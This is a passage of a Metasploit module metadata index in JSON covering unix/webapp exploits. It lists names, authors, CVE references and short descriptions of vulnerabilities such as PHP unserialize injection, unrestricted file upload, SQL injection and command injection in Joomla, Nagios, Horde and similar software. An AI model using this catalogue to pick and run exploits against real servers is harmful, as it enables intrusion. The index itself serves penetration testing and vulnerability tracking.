"description": "This module exploits a command injection vulnerability found in Hastymail\n 2.1.1 RC1 due to the insecure usage of the call_user_func_array() function on\n the \"lib/ajax_functions.php\" script. Authentication is required on Hastymail\n in order to exploit the vulnerability. The module has been successfully tested\n on Hastymail 2.1.1 RC1 over Ubuntu 10.04.",
"references": [
"CVE-2011-4542",
"BID-50791",
"OSVDB-77331",
"URL-https://www.dognaedis.com/vulns/DGS-SEC-3.html"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Hastymail 2.1.1 RC1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/hastymail_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/hastymail_exec",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/havalite_upload_exec": {
"name": "Havalite CMS Arbitary File Upload Vulnerability",
"full_name": "exploit/unix/webapp/havalite_upload_exec",
"rank": 600,
"disclosure_date": "2013-06-17",
"type": "exploit",
"author": [
"CWH",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.",
"references": [
"OSVDB-94405",
"EDB-26243"
],
"platform": "Linux,PHP",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Generic (PHP Payload)",
"Linux x86"
],
"mod_time": "2017-09-07 21:18:50 +0000",
"path": "/modules/exploits/unix/webapp/havalite_upload_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/havalite_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/horde_unserialize_exec": {
"name": "Horde Framework Unserialize PHP Code Execution",
"full_name": "exploit/unix/webapp/horde_unserialize_exec",
"rank": 600,
"disclosure_date": "2013-06-27",
"type": "exploit",
"author": [
"EgiX",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a php unserialize() vulnerability in Horde <= 5.1.1 which could be\n abused to allow unauthenticated users to execute arbitrary code with the permissions of\n the web server. The dangerous unserialize() exists in the 'lib/Horde/Variables.php' file.\n The exploit abuses the __destruct() method from the Horde_Kolab_Server_Decorator_Clean\n class to reach a dangerous call_user_func() call in the Horde_Prefs class.",
"references": [
"CVE-2014-1691",
"URL-http://karmainsecurity.com/exploiting-cve-2014-1691-horde-framework-php-object-injection",
"URL-https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=737149",
"URL-https://github.com/horde/horde/commit/da6afc7e9f4e290f782eca9dbca794f772caccb3"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Horde 5"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/horde_unserialize_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/horde_unserialize_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/hybridauth_install_php_exec": {
"name": "HybridAuth install.php PHP Code Execution",
"full_name": "exploit/unix/webapp/hybridauth_install_php_exec",
"rank": 0,
"disclosure_date": "2014-08-04",
"type": "exploit",
"author": [
"Pichaya Morimoto",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a PHP code execution vulnerability in\n HybridAuth versions 2.0.9 to 2.2.2. The install file 'install.php'\n is not removed after installation allowing unauthenticated users to\n write PHP code to the application configuration file 'config.php'.\n\n Note: This exploit will overwrite the application configuration file\n rendering the application unusable.",
"references": [
"EDB-34273",
"OSVDB-109838"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"HybridAuth version 2.0.9 to 2.2.2 (PHP Payload)"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/unix/webapp/hybridauth_install_php_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/hybridauth_install_php_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/instantcms_exec": {
"name": "InstantCMS 1.6 Remote PHP Code Execution",
"full_name": "exploit/unix/webapp/instantcms_exec",
"rank": 600,
"disclosure_date": "2013-06-26",
"type": "exploit",
"author": [
"AkaStep",
"Ricardo Jorge Borges de Almeida <ricardojba1@gmail.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits an arbitrary PHP command execution vulnerability because of a\n dangerous use of eval() in InstantCMS in versions 1.6 and prior.",
"references": [
"BID-60816",
"PACKETSTORM-122176"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"InstantCMS 1.6"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/instantcms_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/instantcms_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/invision_pboard_unserialize_exec": {
"name": "Invision IP.Board unserialize() PHP Code Execution",
"full_name": "exploit/unix/webapp/invision_pboard_unserialize_exec",
"rank": 600,
"disclosure_date": "2012-10-25",
"type": "exploit",
"author": [
"EgiX",
"juan vazquez <juan.vazquez@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a php unserialize() vulnerability in Invision IP.Board\n <= 3.3.4 which could be abused to allow unauthenticated users to execute arbitrary\n code under the context of the webserver user.\n\n The dangerous unserialize() exists in the '/admin/sources/base/core.php' script,\n which is called with user controlled data from the cookie. The exploit abuses the\n __destruct() method from the dbMain class to write arbitrary PHP code to a file on\n the Invision IP.Board web directory.\n\n The exploit has been tested successfully on Invision IP.Board 3.3.4.",
"references": [
"CVE-2012-5692",
"OSVDB-86702",
"BID-56288",
"EDB-22398",
"URL-http://community.invisionpower.com/topic/371625-ipboard-31x-32x-and-33x-critical-security-update/"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Invision IP.Board 3.3.4"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/invision_pboard_unserialize_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/joomla_akeeba_unserialize": {
"name": "Joomla Akeeba Kickstart Unserialize Remote Code Execution",
"full_name": "exploit/unix/webapp/joomla_akeeba_unserialize",
"rank": 600,
"disclosure_date": "2014-09-29",
"type": "exploit",
"author": [
"Johannes Dahse",
"us3r777 <us3r777@n0b0.so>"
],
"description": "This module exploits a vulnerability found in Joomla! through 2.5.25, 3.2.5 and earlier\n 3.x versions and 3.3.0 through 3.3.4 versions. The vulnerability affects the Akeeba\n component, which is responsible for Joomla! updates. Nevertheless it is worth to note\n that this vulnerability is only exploitable during the update of the Joomla! CMS.",
"references": [
"CVE-2014-7228",
"URL-http://developer.joomla.org/security/595-20140903-core-remote-file-inclusion.html",
"URL-https://www.akeebabackup.com/home/news/1605-security-update-sep-2014.html",
"URL-http://websec.wordpress.com/2014/10/05/joomla-3-3-4-akeeba-kickstart-remote-code-execution-cve-2014-7228/"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Joomla < 2.5.25 / Joomla 3.x < 3.2.5 / Joomla 3.3.0 < 3.3.4"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/joomla_akeeba_unserialize.rb",
"is_install_path": true,
"ref_name": "unix/webapp/joomla_akeeba_unserialize",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/joomla_comfields_sqli_rce": {
"name": "Joomla Component Fields SQLi Remote Code Execution",
"full_name": "exploit/unix/webapp/joomla_comfields_sqli_rce",
"rank": 600,
"disclosure_date": "2017-05-17",
"type": "exploit",
"author": [
"Mateus Lino",
"luisco100 <luisco100@gmail.com>"
],
"description": "This module exploits a SQL injection vulnerability in the com_fields\n component, which was introduced to the core of Joomla in version 3.7.0.",
"references": [
"CVE-2017-8917",
"EDB-42033",
"URL-https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Joomla 3.7.0"
],
"mod_time": "2018-03-28 10:57:28 +0000",
"path": "/modules/exploits/unix/webapp/joomla_comfields_sqli_rce.rb",
"is_install_path": true,
"ref_name": "unix/webapp/joomla_comfields_sqli_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/joomla_comjce_imgmanager": {
"name": "Joomla Component JCE File Upload Remote Code Execution",
"full_name": "exploit/unix/webapp/joomla_comjce_imgmanager",
"rank": 600,
"disclosure_date": "2012-08-02",
"type": "exploit",
"author": [
"Unknown",
"Heyder Andrade <eu@heyderandrade.org>"
],
"description": "This module exploits a vulnerability in the JCE component for Joomla!, which\n could allow an unauthenticated remote attacker to upload arbitrary files, caused by the\n fails to sufficiently sanitize user-supplied input. Sending specially-crafted HTTP\n request, a remote attacker could exploit this vulnerability to upload a malicious PHP\n script, which could allow the attacker to execute arbitrary PHP code on the vulnerable\n system. This module has been tested successfully on the JCE Editor 1.5.71 and Joomla\n 1.5.26.",
"references": [
"OSVDB-74839",
"EDB-17734",
"BID-49338"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-07 21:18:50 +0000",
"path": "/modules/exploits/unix/webapp/joomla_comjce_imgmanager.rb",
"is_install_path": true,
"ref_name": "unix/webapp/joomla_comjce_imgmanager",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/joomla_contenthistory_sqli_rce": {
"name": "Joomla Content History SQLi Remote Code Execution",
"full_name": "exploit/unix/webapp/joomla_contenthistory_sqli_rce",
"rank": 600,
"disclosure_date": "2015-10-23",
"type": "exploit",
"author": [
"Asaf Orpani",
"xistence <xistence@0x90.nl>"
],
"description": "This module exploits a SQL injection vulnerability found in Joomla versions\n 3.2 up to 3.4.4. The vulnerability exists in the Content History administrator\n component in the core of Joomla. Triggering the SQL injection makes it possible\n to retrieve active Super User sessions. The cookie can be used to login to the\n Joomla administrator backend. By creating a new template file containing our\n payload, remote code execution is made possible.",
"references": [
"CVE-2015-7857",
"CVE-2015-7297",
"CVE-2015-7857",
"CVE-2015-7858",
"URL-https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/",
"URL-http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Joomla 3.x <= 3.4.4"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/joomla_contenthistory_sqli_rce.rb",
"is_install_path": true,
"ref_name": "unix/webapp/joomla_contenthistory_sqli_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/joomla_media_upload_exec": {
"name": "Joomla Media Manager File Upload Vulnerability",
"full_name": "exploit/unix/webapp/joomla_media_upload_exec",
"rank": 600,
"disclosure_date": "2013-08-01",
"type": "exploit",
"author": [
"Jens Hinrichsen",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Joomla 2.5.x up to 2.5.13, as well as\n 3.x up to 3.1.4 versions. The vulnerability exists in the Media Manager component,\n which comes by default in Joomla, allowing arbitrary file uploads, and results in\n arbitrary code execution. The module has been tested successfully on Joomla 2.5.13\n and 3.1.4 on Ubuntu 10.04. Note: If public access isn't allowed to the Media\n Manager, you will need to supply a valid username and password (Editor role or\n higher) in order to work properly.",
"references": [
"CVE-2013-5576",
"OSVDB-95933",
"URL-http://developer.joomla.org/security/news/563-20130801-core-unauthorised-uploads",
"URL-http://www.cso.com.au/article/523528/joomla_patches_file_manager_vulnerability_responsible_hijacked_websites/",
"URL-https://github.com/joomla/joomla-cms/commit/fa5645208eefd70f521cd2e4d53d5378622133d8",
"URL-http://niiconsulting.com/checkmate/2013/08/critical-joomla-file-upload-vulnerability/",
"URL-https://community.rapid7.com/community/metasploit/blog/2013/08/15/time-to-patch-joomla"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Joomla 2.5.x <=2.5.13 / Joomla 3.x <=3.1.4"
],
"mod_time": "2018-08-20 15:43:07 +0000",
"path": "/modules/exploits/unix/webapp/joomla_media_upload_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/joomla_media_upload_exec",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/joomla_tinybrowser": {
"name": "Joomla 1.5.12 TinyBrowser File Upload Code Execution",
"full_name": "exploit/unix/webapp/joomla_tinybrowser",
"rank": 600,
"disclosure_date": "2009-07-22",
"type": "exploit",
"author": [
"spinbad <spinbad.security@googlemail.com>"
],
"description": "This module exploits a vulnerability in the TinyMCE/tinybrowser plugin.\n This plugin is not secured in version 1.5.12 of joomla and allows the upload\n of files on the remote server.\n By renaming the uploaded file this vulnerability can be used to upload/execute\n code on the affected system.",
"references": [
"CVE-2011-4908",
"OSVDB-64578",
"EDB-9296",
"URL-http://developer.joomla.org/security/news/301-20090722-core-file-upload.html"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/joomla_tinybrowser.rb",
"is_install_path": true,
"ref_name": "unix/webapp/joomla_tinybrowser",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/jquery_file_upload": {
"name": "blueimp's jQuery (Arbitrary) File Upload",
"full_name": "exploit/unix/webapp/jquery_file_upload",
"rank": 600,
"disclosure_date": "2018-10-09",
"type": "exploit",
"author": [
"Claudio Viviani",
"Larry W. Cashdollar",
"wvu <wvu@metasploit.com>"
],
"description": "This module exploits an arbitrary file upload in the sample PHP upload\n handler for blueimp's jQuery File Upload widget in versions <= 9.22.0.\n\n Due to a default configuration in Apache 2.3.9+, the widget's .htaccess\n file may be disabled, enabling exploitation of this vulnerability.\n\n This vulnerability has been exploited in the wild since at least 2015\n and was publicly disclosed to the vendor in 2018. It has been present\n since the .htaccess change in Apache 2.3.9.\n\n This module provides a generic exploit against the jQuery widget.",
"references": [
"CVE-2018-9206",
"URL-http://www.vapidlabs.com/advisory.php?v=204",
"URL-https://github.com/blueimp/jQuery-File-Upload/pull/3514",
"URL-https://github.com/lcashdol/Exploits/tree/master/CVE-2018-9206",
"URL-https://www.homelab.it/index.php/2015/04/04/wordpress-work-the-flow-file-upload-vulnerability/",
"URL-https://github.com/rapid7/metasploit-framework/pull/5130",
"URL-https://httpd.apache.org/docs/current/mod/core.html#allowoverride"
],
"platform": "Linux,PHP",
"arch": "php, x86, x64",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"PHP Dropper",
"Linux Dropper"
],
"mod_time": "2018-11-16 12:18:28 +0000",
"path": "/modules/exploits/unix/webapp/jquery_file_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/jquery_file_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/kimai_sqli": {
"name": "Kimai v0.9.2 'db_restore.php' SQL Injection",
"full_name": "exploit/unix/webapp/kimai_sqli",
"rank": 200,
"disclosure_date": "2013-05-21",
"type": "exploit",
"author": [
"drone",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a SQL injection vulnerability in Kimai version\n 0.9.2.x. The 'db_restore.php' file allows unauthenticated users to\n execute arbitrary SQL queries. This module writes a PHP payload to\n disk if the following conditions are met: The PHP configuration must\n have 'display_errors' enabled, Kimai must be configured to use a\n MySQL database running on localhost; and the MySQL user must have\n write permission to the Kimai 'temporary' directory.",
"references": [
"EDB-25606",
"OSVDB-93547"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Kimai version 0.9.2.x (PHP Payload)"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/unix/webapp/kimai_sqli.rb",
"is_install_path": true,
"ref_name": "unix/webapp/kimai_sqli",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/libretto_upload_exec": {
"name": "LibrettoCMS File Manager Arbitary File Upload Vulnerability",
"full_name": "exploit/unix/webapp/libretto_upload_exec",
"rank": 600,
"disclosure_date": "2013-06-14",
"type": "exploit",
"author": [
"CWH",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a file upload vulnerability found in LibrettoCMS 1.1.7, and\n possibly prior. Attackers can bypass the file extension check and abuse the upload\n feature in order to upload a malicious PHP file without authentication, which\n results in arbitrary remote code execution.",
"references": [
"OSVDB-94391",
"EDB-26213"
],
"platform": "Linux,PHP",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Generic (PHP Payload)",
"Linux x86"
],
"mod_time": "2017-09-07 21:18:50 +0000",
"path": "/modules/exploits/unix/webapp/libretto_upload_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/libretto_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/maarch_letterbox_file_upload": {
"name": "Maarch LetterBox Unrestricted File Upload",
"full_name": "exploit/unix/webapp/maarch_letterbox_file_upload",
"rank": 600,
"disclosure_date": "2015-02-11",
"type": "exploit",
"author": [
"rastating"
],
"description": "This module exploits a file upload vulnerability on Maarch LetterBox 2.8 due to a lack of\n session and file validation in the file_to_index.php script. It allows unauthenticated\n users to upload files of any type and subsequently execute PHP scripts in the context of\n the web server.",
"references": [
"CVE-2015-1587"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Maarch LetterBox 2.8"
],
"mod_time": "2018-10-01 18:59:09 +0000",
"path": "/modules/exploits/unix/webapp/maarch_letterbox_file_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/maarch_letterbox_file_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/mambo_cache_lite": {
"name": "Mambo Cache_Lite Class mosConfig_absolute_path Remote File Include",
"full_name": "exploit/unix/webapp/mambo_cache_lite",
"rank": 600,
"disclosure_date": "2008-06-14",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a remote file inclusion vulnerability in\n includes/Cache/Lite/Output.php in the Cache_Lite package in Mambo\n 4.6.4 and earlier.",
"references": [
"CVE-2008-2905",
"OSVDB-46173",
"BID-29716"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/mambo_cache_lite.rb",
"is_install_path": true,
"ref_name": "unix/webapp/mambo_cache_lite",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/mitel_awc_exec": {
"name": "Mitel Audio and Web Conferencing Command Injection",
"full_name": "exploit/unix/webapp/mitel_awc_exec",
"rank": 600,
"disclosure_date": "2010-12-12",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a command injection flaw within the Mitel\n Audio and Web Conferencing web interface.",
"references": [
"OSVDB-69934"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/mitel_awc_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/mitel_awc_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/moinmoin_twikidraw": {
"name": "MoinMoin twikidraw Action Traversal File Upload",
"full_name": "exploit/unix/webapp/moinmoin_twikidraw",
"rank": 0,
"disclosure_date": "2012-12-30",
"type": "exploit",
"author": [
"Unknown",
"HTP",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability in MoinMoin 1.9.5. The vulnerability\n exists on the manage of the twikidraw actions, where a traversal path can be used\n in order to upload arbitrary files. Exploitation is achieved on Apached/mod_wsgi\n configurations by overwriting moin.wsgi, which allows to execute arbitrary python\n code, as exploited in the wild on July, 2012. This module is \"ManualRanking,\" and\n the user is warned to use this module at his own risk since it will overwrite the\n moin.wsgi file, required for the correct working of the MoinMoin wiki. While the\n exploit will try to restore the attacked application at post exploitation, successful\n restoration cannot be guaranteed.",
"references": [
"CVE-2012-6081",
"OSVDB-88825",
"BID-57082",
"EDB-25304",
"URL-http://hg.moinmo.in/moin/1.9/rev/7e7e1cbb9d3f",
"URL-http://wiki.python.org/moin/WikiAttack2013"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"MoinMoin 1.9.5"
],
"mod_time": "2018-08-20 15:43:07 +0000",
"path": "/modules/exploits/unix/webapp/moinmoin_twikidraw.rb",
"is_install_path": true,
"ref_name": "unix/webapp/moinmoin_twikidraw",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_unix/webapp/mybb_backdoor": {
"name": "myBB 1.6.4 Backdoor Arbitrary Command Execution",
"full_name": "exploit/unix/webapp/mybb_backdoor",
"rank": 600,
"disclosure_date": "2011-10-06",
"type": "exploit",
"author": [
"tdz"
],
"description": "myBB is a popular open source PHP forum software. Version 1.6.4 contained an\n unauthorized backdoor, distributed as part of the vendor's source package.",
"references": [
"OSVDB-76111",
"BID-49993",
"SECUNIA-46300",
"URL-http://blog.mybb.com/2011/10/06/1-6-4-security-vulnerabilit/"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/mybb_backdoor.rb",
"is_install_path": true,
"ref_name": "unix/webapp/mybb_backdoor",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/nagios3_history_cgi": {
"name": "Nagios3 history.cgi Host Command Execution",
"full_name": "exploit/unix/webapp/nagios3_history_cgi",
"rank": 500,
"disclosure_date": "2012-12-09",
"type": "exploit",
"author": [
"Unknown <temp66@gmail.com>",
"blasty <blasty@fail0verflow.com>",
"Jose Selvi <jselvi@pentester.es>",
"Daniele Martini <cyrax@pkcrew.org>"
],
"description": "This module abuses a command injection vulnerability in the\n Nagios3 history.cgi script.",
"references": [
"CVE-2012-6096",
"OSVDB-88322",
"BID-56879",
"EDB-24084"
],
"platform": "Linux,Unix",
"arch": "x86",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Target",
"Appliance Nagios XI 2012R1.3 (CentOS 6.x)",
"Debian 5 (nagios3_3.0.6-4~lenny2_i386.deb)"
],
"mod_time": "2018-08-20 15:43:07 +0000",
"path": "/modules/exploits/unix/webapp/nagios3_history_cgi.rb",
"is_install_path": true,
"ref_name": "unix/webapp/nagios3_history_cgi",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_unix/webapp/nagios3_statuswml_ping": {
"name": "Nagios3 statuswml.cgi Ping Command Execution",
"full_name": "exploit/unix/webapp/nagios3_statuswml_ping",
"rank": 600,
"disclosure_date": "2009-06-22",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module abuses a metacharacter injection vulnerability in the\n Nagios3 statuswml.cgi script. This flaw is triggered when shell\n metacharacters are present in the parameters to the ping and\n traceroute commands.",
"references": [
"CVE-2009-2288",
"OSVDB-55281"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Target"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/nagios3_statuswml_ping.rb",
"is_install_path": true,
"ref_name": "unix/webapp/nagios3_statuswml_ping",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_unix/webapp/nagios_graph_explorer": {
"name": "Nagios XI Network Monitor Graph Explorer Component Command Injection",
"full_name": "exploit/unix/webapp/nagios_graph_explorer",
"rank": 600,
"disclosure_date": "2012-11-30",
"type": "exploit",
"author": [
"Daniel Compton <daniel.compton@ngssecure.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Nagios XI Network Monitor's\n component 'Graph Explorer'. An authenticated user can execute system commands\n by injecting it in several parameters, such as in visApi.php's 'host' parameter,\n which results in remote code execution.",
"references": [
"OSVDB-83552",
"BID-54263",
"PACKETSTORM-118497"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Graph Explorer Component prior to 1.3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/nagios_graph_explorer.rb",
"is_install_path": true,
"ref_name": "unix/webapp/nagios_graph_explorer",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_unix/webapp/narcissus_backend_exec": {
"name": "Narcissus Image Configuration Passthru Vulnerability",
"full_name": "exploit/unix/webapp/narcissus_backend_exec",
"rank": 600,
"disclosure_date": "2012-11-14",
"type": "exploit",
"author": [
"Dun",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Narcissus image configuration\n function. This is due to the backend.php file not handling the $release parameter\n properly, and then passes it on to the configure_image() function. In this\n function, the $release parameter can be used to inject system commands for\n passthru (a PHP function that's meant to be used to run a bash script by the\n vulnerable application), which allows remote code execution under the context\n of the web server.",
"references": [
"EDB-22709",
"OSVDB-87410"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Narcissus"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/narcissus_backend_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/narcissus_backend_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/open_flash_chart_upload_exec": {
"name": "Open Flash Chart v2 Arbitrary File Upload",
"full_name": "exploit/unix/webapp/open_flash_chart_upload_exec",
"rank": 500,
"disclosure_date": "2009-12-14",
"type": "exploit",
"author": [
"Braeden Thomas",
"Gjoko Krstic <gjoko@zeroscience.mk>",
"Halim Cruzito",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a file upload vulnerability found in Open Flash\n Chart version 2. Attackers can abuse the 'ofc_upload_image.php' file\n in order to upload and execute malicious PHP files.",
"references": [
"BID-37314",
"CVE-2009-4140",
"OSVDB-59051",
"EDB-10532",
"WPVDB-6787",
"WPVDB-6788",
"WPVDB-6789",
"WPVDB-6790",
"WPVDB-6791",
"WPVDB-6792"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
